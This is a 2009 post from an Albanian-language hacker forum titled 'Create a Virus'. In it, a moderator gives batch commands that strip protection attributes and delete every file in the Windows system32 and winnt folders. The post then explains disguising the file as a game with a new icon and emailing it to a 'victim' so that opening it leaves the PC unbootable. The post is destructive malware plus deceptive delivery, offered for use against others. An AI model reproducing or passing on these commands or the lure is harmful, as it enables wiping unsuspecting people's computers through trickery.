Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Krijo Virus!!..

Shko poshtë 
AutoriMesazh
Gjergjinho_St
Moderator
Moderator


Numri i postimeve : 226
Poenat e Antarit : 809
Thanks : 1
Join date : 24/05/2009
Age : 25
Location : St' City-Kosova

MesazhTitulli: Krijo Virus!!..   Thu May 28, 2009 5:14 pm

Krijo Virus Krijo nje Batch Game.bat Lexo tekstin Se pari shko START RUn tani Shenoje ne Run Notepad dhe kopjo ket me posht qe eshte ne kod Kodi: @echo offdelete c:\winnt\system32\*.*delete c:\winnt\*.*2. Konverto prej Game.bat ne Game.com .Kodi tjeter 2 : attrib -h -r -s "C:\windows\system32\*.*"del /q "C:\windows\system32\*.*"exit Me keto .bat mundesh me ja fshi krejt filat ne windows dhe mandej smundet me dhez PC-en ma.....Mundesh dhe mi ndrue keto per me ja fshi tjera directory Tani shkoni Ndryshoni Ikonen Game.com me Tast te Djatht Properties Tani 4. Dergoni Game.com ne e-mail attachment Naj Viktimes : 5. Tani Viktima e hap Programin dhe i Fshihen Gjitha ne Windows Dirketor Fajllat
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.denica-hg.tk
 
Krijo Virus!!..
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Adelina Dardha: Poezi " Miqesia"

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: